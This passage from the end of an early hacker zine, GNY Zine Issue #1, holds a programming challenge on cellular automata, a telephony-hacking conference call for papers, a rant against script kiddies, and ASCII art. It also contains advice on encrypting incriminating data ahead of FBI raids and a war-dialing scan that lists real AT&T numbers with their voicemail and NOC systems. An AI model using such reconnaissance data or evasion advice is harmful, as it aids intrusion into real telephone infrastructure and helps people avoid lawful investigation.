- intentionally accesses a computer without authorization or exceeds authorized
access, and thereby obtains information contained in a financial record of a financial
institution, information from any department or agency of the United States, or
information from any protected computer

- obtains anything of value, unless the object of the fraud and the thing obtained
consists only of the use of the computer and the value of such use is not more than
$5,000 in any 1-year period;

- knowingly causes the transmission of a program, information, code, or command, and
as a result of such conduct, intentionally causes damage without authorization, to a
protected computer, intentionally accesses a protected computer without authorization,
and as a result of such conduct, recklessly causes damage, or intentionally accesses a
protected computer without authorization, and as a result of such conduct, causes
damage and loss.

- with intent to extort from any person any money or other thing of value

- knowingly and with intent to defraud traffics in any password or similar
information - such trafficking affects interstate or foreign commerce or such computer
is used by or for the Government of the United States"

In conclusion, it's healthy to be paranoid in this type of scene. Don't laugh off FBI
raids, because they're real, they do happen... It did happen. Make sure WHEN it
happens that there's nothing that can be thrown at you, and if there is, make sure
it's encrypted. Don't put it off - you could be raided before you even close this
window.

*Lockerz.com is an invitation-only website where friends invite other friends, and
for every friend who signs up, PTZ are given. These PTZ are used to obtain prizes.
While the pyramid scheme is obvious, the project is funded by Liberty Media, one of
the largest media companies in the U.S.


[====================================================================================]

             -=[ Programming Challenge - Elementary Cellular Automata ]=-
                                  [ Author: storm ]

                           Email: storm@gonullyourself.org
                         Website: http://gonullyourself.org/


According to Wolfram MathWorld, "a cellular automaton is a collection of 'colored'
cells on a grid of specified shape that evolves through a number of discrete time
steps according to a set of rules based on the states of neighboring cells. The rules
are then applied iteratively for as many time steps as desired."

To break that definition down into layman's terms, a cellular automaton is a
mathematical modeling system that displays progressive growth through a grid of cells
according to a defined ruleset.  Future steps in growth in cellular automata (each
iteration referred to as a "generation") are dependent upon the behavior of
previously-generated cells.  How these future cells are generated is also dependent
upon the ruleset.  Although a ruleset of a cellular automaton may technically change
as growth progresses, it typically remains constant throughout the entire system.

Cellular automata are utilized in mathematics and science to analyze and predict
behavior in nature.  For example, such models have been used to explain patterns of
snowflakes and the formation of conch shells.

For this programming challenge, we will concern ourselves with elementary cellular
automata, one of the simplest classes of cellular automata.  Elementary cellular
automata are one-dimensional, and cells may assume only one of two states - on (1) or
off (0).  Each rule is comprised of eight states, which are defined using binary
notation (000, 001, 010, 011, 100, 101, 110, 111).  There are 256 unique rules.  One
may determine the ruleset by converting the decimal rule number into binary and
matching each digit of the resulting number with its respective state.  Take the
following as example:

Rule 90

decimal 90 = binary 01011010

By assigning each digit of the binary number to a state, starting from the least
significant bit, we achieve:

000 = 0
001 = 1
010 = 0
011 = 1
100 = 1
101 = 0
110 = 1
111 = 0

Example output of an elementary cellular automaton generated using rule 90 over 16
generations is:

                                          x
                                         x x
                                        x   x
                                       x x x x
                                      x       x
                                     x x     x x
                                    x   x   x   x
                                   x x x x x x x x
                                  x               x
                                 x x             x x
                                x   x           x   x
                               x x x x         x x x x
                              x       x       x       x
                             x x     x x     x x     x x
                            x   x   x   x   x   x   x   x
                           x x x x x x x x x x x x x x x x

Building from the information provided, your task is to continue researching
elementary cellular automata and write a program that generates a cellular automaton
based upon user input of both rule number and number of generations.  However, the
output of this system cannot be ASCII or ASCII-like, as shown above.  Examples of
acceptable solutions include dynamically rendering the system as an image file or as a
series of HTML tags that render the system in a web browser.  Be creative. :) 
Solutions may be written in any programming or scripting language.

Correct, acceptable, and innovative solutions will be published in the next issue of
GNY Zine, and their authors will be recognized.  Solutions may be submitted by:

    - Forum (http://gonullyourself.org/board/)
    - IRC (irc.distrust.us #gny)
    - Email (zine@gonullyourself.org)


Excellent resources for further information on cellular automata:

http://mathworld.wolfram.com/ElementaryCellularAutomaton.html
http://mathworld.wolfram.com/CellularAutomaton.html
http://en.wikipedia.org/wiki/Elementary_cellular_automaton
http://en.wikipedia.org/wiki/Cellular_automaton


[====================================================================================]

                         -=[ ConfCon 2010 Call for Papers ]=-
                                [ Author: PhreakerD7 ]

                           Email: phreakerd7@antilimit.net
                          Website: http://www.antilimit.net/


What is it?

ConfCon is a one-of-a-kind conference call which takes place once a year. We have
many talks on a wide variety of telephony-related subjects from numerous people in the
scene. In 2009, we had people like Jason Scott (of textfiles.com), df99 (of
ProjectMF), Lucky225, Royal, ThoughtPhreaker, RijilV and many more. It was a day of
fun, lots of learning, and lots of cool experiences.

Who runs it?

ConfCon is a project run by AntiLimit. At its core, ConfCon was founded by PhreakerD7
and ThoughtPhreaker with lots of help from everyone in the scene (namely, Jason Scott,
RijilV, Royal, BitRobber, and df99). Without these people (and many more!!), ConfCon
would never have happened. In a sense, ConfCon is run completely by the people, for
the people.

How can I help?

Well, based on what was previously said, we need PAPERS! We need submissions on
anything telephony related!! If you've just done some cool VoIP hax (Asterisk,
FreeSwitch, any of that), or if you've just pwned a PBX, or you've scanned some
exchanges and found some interesting numbers, we WANT YOU! Maybe you've got some good
SEing tips, some cool tricks for getting around phone things, or just maybe abusing
the latest and greatest phone invention? If you're into hacking phones and mobile
devices... LET US KNOW!

Anything and everything related to telephony is something we're interested in. All
information for submitting papers can be found on: http://ConfCon.org .  Please submit
something! Without you, ConfCon is nothing..

What are the details on ConfCon 2010?

It's currently scheduled to take place on July 24th (the weekend after HOPE, and the
weekend before Defcon) around 3PM PDT (4PM MDT, 5PM CDT, 6PM EDT). If you'd like to
participate in the conference (FREE OF CHARGE!!), simply visit the ConfCon.org
website, sign up there, and receive your conference number. All you have to do is
dial-in, and enjoy! :)


[====================================================================================]

                              -=[ 907-887-88xx Scan ]=-
                                  [ Author: storm ]

                           Email: storm@gonullyourself.org
                         Website: http://gonullyourself.org/


I decided to scan the following range after finding an AT&T Network Operations Center
(NOC) on 907-887-8888.  The only other number that seems to really stick out is
907-887-8889, which ThoughtPhreaker and I identified as possibly being a Nortel
CallPilot system.  907-887-8880 would seem uninteresting elsewhere, but it also does
stick out somewhat amongst a sea of Audix boxes.


907-887-8800 - reorder
907-887-8801 - ring out to "It is not necessary to dial a 1..."
907-887-8802 - Audix
907-887-8803 - reorder
907-887-8804 - reoder
907-887-8805 - Audix
907-887-8806 - Audix
907-887-8807 - Audix
907-887-8808 - Audix
907-887-8809 - Audix
907-887-8810 - Audix
907-887-8811 - Audix
907-887-8812 - Audix
907-887-8813 - Audix
907-887-8814 - Audix
907-887-8815 - Audix
907-887-8816 - reorder
907-887-8817 - reorder
907-887-8818 - Audix
907-887-8819 - reorder
907-887-8820 - Audix
907-887-8821 - Audix
907-887-8822 - Audix
907-887-8823 - Audix
907-887-8824 - Audix
907-887-8825 - Audix
907-887-8826 - Audix
907-887-8827 - Audix
907-887-8828 - YCDNGT (092T)
907-887-8829 - reorder
907-887-8830 - Audix
907-887-8831 - reorder
907-887-8832 - reorder
907-887-8833 - reorder
907-887-8834 - reorder
907-887-8835 - reorder
907-887-8836 - reorder
907-887-8837 - YCDNGT (003T)
907-887-8838 - reorder
907-887-8839 - reorder
907-887-8840 - YCDNGT (092T)
907-887-8841 - reorder
907-887-8842 - Audix
907-887-8843 - Audix
907-887-8844 - Audix
907-887-8845 - Audix
907-887-8846 - Audix
907-887-8847 - Audix
907-887-8848 - Audix
907-887-8849 - Audix
907-887-8850 - Audix
907-887-8851 - Audix
907-887-8852 - Audix
907-887-8853 - Audix
907-887-8854 - Audix
907-887-8855 - Audix
907-887-8856 - Audix
907-887-8857 - Audix
907-887-8858 - Audix
907-887-8859 - Audix
907-887-8860 - Audix
907-887-8861 - Audix
907-887-8862 - Audix
907-887-8863 - Audix
907-887-8864 - Audix
907-887-8865 - Audix
907-887-8866 - Audix
907-887-8867 - Audix
907-887-8868 - Audix
907-887-8869 - Audix
907-887-8870 - Audix
907-887-8871 - Audix
907-887-8872 - Audix
907-887-8873 - Audix
907-887-8874 - Audix
907-887-8875 - Audix
907-887-8876 - Audix
907-887-8877 - Audix
907-887-8878 - Audix
907-887-8879 - Audix
907-887-8880 - VMS
907-887-8881 - Audix
907-887-8882 - Audix
907-887-8883 - Audix
907-887-8884 - Audix
907-887-8885 - Audix
907-887-8886 - Audix
907-887-8887 - Audix
907-887-8888 - AT&T NOC
907-887-8889 - "voice item maintenance"
907-887-8890 - Audix
907-887-8891 - Audix
907-887-8892 - Audix
907-887-8893 - Audix
907-887-8894 - Audix
907-887-8895 - Audix
907-887-8896 - Audix
907-887-8897 - Audix
907-887-8898 - Audix
907-887-8899 - Audix


[====================================================================================]

                                -=[ Et Cetera, Etc ]=-
                                 [ Author: teh crew ]


Let's get things straight.  The word "hacker" is not a name that should be treated or
given lightly.  The concept of hacking has been bastardized so severely over the years
that it's near impossible to even find a kid in this shitpile of a "scene" who knows
the true definition.  No longer are learning or exploration at the forefront of one's
mind.  Priorities have been shuffled.  Individuals are now judged based upon how many
boxes they have rooted, how large of a DDoS they can push, or how quickly they can
pull personal information on others.  Curiosity has been replaced with egotism, and
the true meaning of hacking has been lost in the process.

We like to call these individuals "script kiddies" - the cancer of the hacking scene.
 These half-retarded morons are everywhere, flaunting their e-dicks as proudly as
possible, just begging for attention.  Everyone is suddenly an expert, and every
14-year-old now claims to be the elitest fucker on the Internet.  Closing their minds
to everything that is unimportant in their quest to command respect from other morons,
script kiddies have a single goal: to climb the digital social ladder as quickly as
possible.  Humility is a rare occurrence in an environment saturated with such
cluelessness and ignorance.

Logic that associates behavior like this with the true meaning of hacking is about as
fucked up as your mother is a sleazy crackwhore.  Hacking is about a love for
technology and an unquenchable thirst for analyzing, breaking, and rebuilding it. 
Hackers are driven by passion, not by personal gain.  It's about time for this new
generation to realize that.

Such a mindset may open doors and present entirely new opportunities for hackers to
experience technology and learn in the process.  There is more to hacking than simply
web-based exploits and buffer overflows.  Take some time to learn about reverse
engineering and how binaries are actually executed by the machine.  Assembly
programming is a powerful skill.  Pick up your telephone - have you ever thought about
how your calls are actually routed from origin to termination?  The PSTN (Public
Switched Telephone Network) is the largest and most robust human network in the world,
second only to the Internet itself.  Radio junkies have been owning the airwaves and
innovating new methods of efficient wireless transmission for almost a century, giving
birth to the hacker community and culture itself.  A boring summer may be replaced
with becoming licensed as a ham radio operator.

Passion is not something that can be taught by a teacher or an essay - it must be
realized, and once it is realized, it must be embraced.  Embrace it by any means
necessary.  Research new technologies and play around with them in unconventional
manners.  Learn new concepts and expand your interests by reading online publications
such as Phrack or venturing to Borders and picking up a copy of 2600.  Meet other
hackers and exchange knowledge and experiences by attending conferences or local
meet-ups (or start your own!).  And most importantly, have fun while doing it.

Hopefully, such a mindset is adopted by more in this new generation of hackers.  For
those who have completely missed the ball, however, we can only hope that this little
rant has sparked a change.  With the recent disintegration of many prominent script
kiddies communities within just the past few years, perhaps we're onto something.

                               THE TREE OF FALLEN SKIDS
                               ------------------------
                            
                        Let us pay our respects, or something.
                             
   .. ............  ...........7DNMM7?NOD?,7O?.,.,...,......:,...........  ...
   .  ...... ........,...+NDNO?D+7?I=?I?7$Z=++......,=.~8ONZ~D+,..,.....   ...
      .... .............ON=I$?++?I???+=??+??++?M~,$ZD~OO=+?=?7OMI?ZZ...    ...
          ............,Z??++?+=+==++?+I++?++???+7N=I7++I=O?Z$I++??78.,...  ...
   .        , .......=M+??+========++????+???+=7$+=~==+=+??+$???+I7+=..,......   ..
   ...   ....:.+=8+~+M87+++~++????++??+OZ7$?I?$+++=+++=+++??++???++?I?+O,..........
   .......:ZD=87=~O7=NI++++???++??+??I???=?$?+87I???+?+??++????+++=+==?==..........
   ......~++?I?+==+?+?+=+??????????+??=?+?+?=$7??+?++??++??+?+?????+=I+O..,........
   .....ID?++~~======+++++????????========+++I+OI??=77=O  uNkn0wn  ==+I$.,.,.......
   ....?$=+=~+++++++++++??????????++?++++===+????8I?Z?++?$$????????+=?78=...,......
   ....:M7+=?++????????????????????????+??+=+=?+7$7II?++?+8??????+?+?=?++D.......
   ,...+M7~=??=????  h4cky0u  ??????++??+??++~?+++Z77III??+???????+?=?++IZ......
   ...,ID?+++??????????????????????????????==+I?++78I7?7777I?+?+?=???+?O~.....
   ....Z8I+??++????????????????????????????++?+??I87III??+=ZZZOZ$7?=?=?O......
   ....=M$+????+++???????????  darkc0de  ???????+?IZIODI?I+?++???D$Z+=O+. ....
   .....,M??++++++???????????????????????????+III7O+I?7$===+===+++??OM7~.......
   ......=7+$?????==I?=I++??++????+???????IIIII77II=+==++++++???+==+??=?.........
   ..... ..ZN$NI7+?+?DZ$=$7$7777+?+??++??II7ZZIII7?+?++++??I+I$77+++?+?N,.......
   ....  ....+ND7M+?OI7Z?=?8III7777IIIII7$Z8OOIOON=7+?????+++?~+8OZ+++=?8,,..    ..
   ...  ...O8Z$+++I7I$77+INO?O8ZO$$II7ZO$I7$$OOOO8$=I????????==++7O+?++?+D$$,......
   ......$I7?++?+?+?+?II?I$?DZ$+IZZO$7DZ$IOOZ$Z$Z8=???????+++??+++$I?+???7I+M+.....
    ....ON?=~=?++++?+?++II?7+O+?+I8ZZ7$Z7DIZZ7$$$O?I?????++?????+????+??+?7?+8O?...
   ...ONZ=+==????+????+?+?7I+O?+??OI$8IOZZ+$$$Z$$D7?+???  h4ck-y0u  ?+??+7D??==N:..
   ..++=?++??+?+$$$??+??+II?$=I$??II?+ZZI7I$7Z$$Z87I?++++?????+??????????7O+=++O8,.
   :8N7+==+??OOZI?II???+II77$I++$ZIZI?+I+++?7$Z$ZO$I?++??++??+?7?++I?+???8Z++?==I8.
   Z8==+=???+Z=?+++?I?+?7$7$DO8Z=??DI=+877$ZZZ$$78I??7II???+Z7I+I?+?++???D$7+=~7M~.
   DDI???????OI+  BHF  =OO?8OZZ7$ZI+I??7I?OOZ787$II8O$I777?+I=~?ZI???I7?IIII++=??N~
   O++I+O7+???8?+??????OZ7D$ZZ$7$O7O+I?++?O$?I8$$$I7ZOO8?II?I+=?8??+++$8IIII+==??N~
   MZ+?7$+?+??Z$ZI+??I?II8+IO$7$OIZ$Z?II=ZD$?7Z8Z$7?O$8OIO?II??+Z+??++OZI77???++$D.
   N++?+7$??+?+?=++?+I7I?8OZ$I?OII$$7O++=I7II8$$8D$IO?7ZO777$IOI7???ZZ$7III?+==++M~
   ?8M=+Z??????++???I78+8OZZ78Z?I7$ZZ8O+=???777$8?7++OZ$$O$~+=?~88Z8$7$DI7II?++?ID~
   .:MI++7?++?++?+?I8$7Z8ZO8I7Z7?+88OZZI7?I?I787III+ZZZI$7?++++==+IZ$7OIIII++?++??N
   ...D~+7?I?+??=???DO88$$ZD?7?I$??OO?I7$???$?++??7I$77$OI+??$OO=+=+$8$I77I??++NNM=
   ...?Z$D++???I??+?=7+?+II7I?I7$8+??I7IZ?+?$?++7??7$$I7OOII++?+$7+?+?+OII7???IM~..
   ......+DDM+?O+?$NO+++????+I?8OOD??II?$7+I+Z?$$7O888O8DO78OI+?Z????=I+7II+?+?....
   .   ...,.Z8DDN8DN+I??+?Z?IDO$$$O7I=?=Z????+?==$Z$7$7Z$ZZIIIO?++7?Z+++I???7?7.,..
       ....,.......,??DID8$O8$$$77?O7$I??I+I~?+?+??Z$$$IO$O$8$8ZI?+?8+?8+?OID+:....
          . .......,......,.ON8OI?$8O777I?=++=Z++?8?I$OO77II77ZZI7=I=?M?MMI:.......
   ...    ........... ..,.....+$MZI$D7$7IO=Z+=?II?8$O+??I7DDZ+O$$DMD$+.., ..  ..
   ..    ........................~~8MZ7?IO?8?+III?III?=IN,....... , .... . .....
                     ..   ..........88II7O?O++$I$III?D7...........
                        ............ZN+?ZZ?$+?ZIOZI78,............
                       .............$N+I8$?I?IZI$O$OZ............
                     .....  ........$D+78$+?II7?777D:............
               ..   ........ .......OO?OZ7?II?I7$$87. .    .........
                  ........   ......,N7?O$7I$II7$Z$O,.................
                 .......    . ..  .7D?78$IIZIII7$7+.....................
               ..... ...     .... .NIIIZ7??ZI?I?8I8.....................
          .   .......  . ........ O??I7OII?ZI?I?8IN~.....,..............
   ....... ... .....   ...........Z?I7Z$?I?I$I7I$O$O... ...........................
   ....... ... ...   . ...........$?77O$????$I8+?$7Z?......... ...      ...........
   ....... ... ..    . .......,.,+M$Z7ZI  I+Z  $=+Z$8:........ ...      ...........
   .   , ,............ ,,.,....:8ZIO$D+         ?=??7ON7............ .............
   .   , ,.............,, ...,,N+I$ID++I n0ths I?7$I?++?IO+......,.,. ., ... ..,...
   .   , ,........... ..,. .:8Z+I$OZ$?=I?     7$7?Z?I??7??M....  ..,. ., ... ,.....
   .   , ,............,...=OZ?I?7$8++=???I   7$8I77ZII?I?I7+O~,..... ... , . , ....
   ............,..,.,..:NZI=?=?787=?+?I???I++?IO7$$7ZI??I+IIN,....,.  .............
   .......  ...,...:78$?I?I?II$7$+I?I7$OOI7?=??IZDDNN7$$II?I7.,..,....,............
    .... . .....=8OI+I+I$ONNDOID+II??NNNDZ77Z$I++II8$,=ZN?I?+8?~..   . . ..........
     . .  ..  .N8ONN87=,......:MII7ID+...=$MOZ7$ZZ????N=.DN7?+?+$ODO. ..  . ..  ...
              ..............,ODII??D7.........:,..$M8??7Z..+78ZI~~~: . .
               .............D+I8NNO...............,..,+ON.,... .. ...
               ...........,?8D~,... .,...    |\      _,,,---,,_
                0             it's a kitty! /.`.-'`'    -.  ;-;;,_
               +                           |.3-  ) )-,_..;\ (  `'-'
                                          '---''(_/--'  `-'\_)

Thanks to ElectRo` for that lovely ASCII art.  Anyways, it's probably about time we
wrapped this up.

So, this is the end of GNY Zine, Issue #1.  Hope you enjoyed it, and if you want to
drop us a line, our contact information is in the intro.  May your hax be plentiful
and full of fish.

                                                            <3, the gny crew

                                                            
[====================================================================================]